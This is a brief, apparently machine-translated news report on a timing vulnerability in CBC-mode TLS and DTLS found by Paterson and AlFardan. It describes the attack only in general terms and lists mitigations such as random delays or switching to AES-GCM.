Error in the TLS-protocol can be used to gain access to passwords and other personal information of users.
Professor from University of London Kenny Patterson (Kenny Paterson) and academician Nadhem Alfardan (Nadhem Alfardan) discovered a new vulnerability in the TLS-protocols. This error, which became known on February 4, can be used to gain access to passwords and other personal information of users of sites using HTTPS-protocol.
Paterson and Alfardan said they could implement MITM-attack to decrypt traffic. The vulnerability lies in the exchange of messages between the web-server and browser, it takes several microseconds to process them. During this time, attackers can intercept information transmitted and then gradually restore the data in clear text.
Attackers modify the data used for the encrypted blocks of information and the time it takes the server to determine if a message has been tampered with and reject it. This period of time sufficient to gradually calculate the content of the original message. However, accurate measurement of this period of time is very difficult because the network jitter (jitter), and other abnormalities, and manipulation of the data can lead to rupture of the connection between the browser and the server.
Thus, there is a need to re-examine the server, reproducing slightly modified version of the original encrypted message, just as attacks were carried out using the tool BEAST.
The professor also said that in their current form, these attacks are not a serious threat for the casual user, but with time, they will become much more serious.
Experts said that in cooperation with OpenSSL, Google and Oracle, they found a few options to counter these attacks.
Attacks are on the TLS-protocol version 1.1 or 1.2 and DTLS-protocol versions 1.0 or 1.2. All TLS and DTLS-protocols, encrypted CBC, are also potentially vulnerable. Experts tested the attack on OpenSSL and GnuTLS. OpenSSL for the ability to recover the text of encrypted data for GnuTLS – partial. Blocking attacks can be achieved by adding a random delay time in deciphering CBC or switch to RC4 or AES-GCM.